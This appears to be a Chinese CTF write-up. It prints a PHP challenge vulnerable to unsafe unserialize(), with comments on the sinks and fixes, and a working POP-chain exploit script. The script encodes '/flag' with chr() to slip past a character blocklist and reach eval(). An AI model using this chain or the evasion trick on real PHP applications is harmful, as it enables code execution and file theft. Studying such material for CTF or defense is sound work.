前言
大头哥的复现环境:https://www.yuque.com/dat0u/ctf/kd0httlnqbfhv175
Web
PHP_unserialize_pro
<?php
// Silences every diagnostic (display and log), so the errors raised while the
// chain below runs leave no trail for whoever operates the host.
error_reporting(0);
class Welcome{
    public $name;
    public $arg = 'welcome';

    // The default name deliberately differs from the value the destructor checks.
    public function __construct(){
        $this->name = 'Wh0 4m I?';
    }

    // Runs at object teardown, including for objects produced by unserialize().
    // Loose (==) comparison against a fixed string, then echo of an untyped
    // property: echoing an object invokes its __toString(), which is how a
    // crafted $arg continues the chain. A strict comparison and a string type
    // on $arg would remove this sink.
    public function __destruct(){
        if($this->name != 'A_G00d_H4ck3r'){
            return;
        }
        echo $this->arg;
    }
}
class G00d{
// Callable name and argument string; both are attacker-chosen once the object
// arrives through unserialize().
public $shell;
public $cmd;
// Sink of the chain. Reached when an instance is called like a function
// (H4ck3r::__toString does exactly that with its $func property).
public function __invoke(){
$shell = $this->shell;
$cmd = $this->cmd;
// Character blocklist applied to the raw $cmd only. Blocklists over single
// characters are a weak control; the real fix is to never pass a
// user-derived value to eval() at all.
if(preg_match('/f|l|a|g|\*|\?/i', $cmd)){
die("U R A BAD GUY");
}
// Arbitrary code execution: $shell is called by name with $cmd as its
// argument and whatever it returns is evaluated as PHP.
eval($shell($cmd));
}
}
class H4ck3r{
// Whatever unserialize() placed here; when it is an object, the call below
// dispatches to that object's __invoke().
public $func;
// Runs whenever the object is used in string context, e.g. the echo in
// Welcome::__destruct. There is no return statement: on PHP 8 the missing
// string return is a TypeError, but that is only raised after $function() has
// already executed — TODO confirm on the challenge's PHP version.
public function __toString(){
$function = $this->func;
$function();
}
}
// Entry point: a request parameter goes straight into unserialize(), so any
// class defined above can be instantiated with arbitrary property values and
// its magic methods run on teardown. Mitigation: do not unserialize untrusted
// input (use json_decode for data), or at minimum pass
// ['allowed_classes' => false] as the second argument so no objects are created.
if(isset($_GET['data']))
unserialize($_GET['data']);
else
highlight_file(__FILE__);
?>
利用链: Welcome::__destruct 中的 echo $this->arg 触发 H4ck3r::__toString，其中的 $function() 触发 G00d::__invoke，最终到达 eval($shell($cmd))。
exp:
<?php
class Welcome{
    /** The value Welcome::__destruct on the target compares $name against. */
    const TARGET_NAME = 'A_G00d_H4ck3r';

    public $name;
    /** Overwritten at runtime with the next object of the chain (an H4ck3r). */
    public $arg = 'welcome';

    // Only property values are serialized, so the class here needs no methods
    // beyond setting the name the target checks.
    public function __construct(){
        $this->name = self::TARGET_NAME;
    }
}
class G00d{
    /** Name of the callable the target invokes on $cmd. */
    public $shell = 'strtolower';
    /** Argument string handed to that callable; the target eval()s the result. */
    public $cmd = 'show_source(chr(47).chr(102).chr(49).chr(97).chr(103));';
}
class H4ck3r{
    /** Set at runtime to the G00d instance the target will call. */
    public $func = null;
}
// Assemble the chain through property assignment only; methods are never
// serialized. The printed string is what a request log or WAF would see in the
// data parameter: a Welcome object whose arg property nests further objects,
// which is the shape a detection rule for this endpoint should look for.
$a=new Welcome();
$a->arg=new H4ck3r();
$a->arg->func=new G00d();
echo serialize($a);
meow_blog(不会)
sharedBox(不会)
kkfileview2.2.1 的漏洞利用
kkfileview2.2.1源码:https://github.com/kekingcn/kkFileView/archive/refs/tags/v2.2.1.zip
docker启动:
docker run -it -p 8012:8012 keking/kkfileview:v2.2.1